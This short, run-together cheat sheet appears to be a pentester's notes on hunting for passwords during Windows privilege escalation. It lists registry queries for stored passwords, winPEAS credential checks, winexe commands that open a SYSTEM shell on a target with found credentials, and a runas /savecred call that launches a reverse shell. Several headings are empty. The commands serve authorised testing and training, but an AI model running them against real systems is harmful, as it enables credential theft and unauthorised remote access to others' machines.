Password Hunting
Registry
reg query HKLM /f password /t REG_SZ /s reg query HKCM /f password /t REG_SZ /s.\winPEASany.exe quiet filesinfo userinfowinexe -U 'admin%password123' //192.168.X.X cmd.exewinexe -U 'admin%password123' --system //192.168.X.X cmd.exeSaved Creds
.\winPEASany.exe quiet cmd windowscredscmdkey /listrunas /savecred /user:admin C:\path\to\reverseshell.exeConfig Files
SAM
Last updated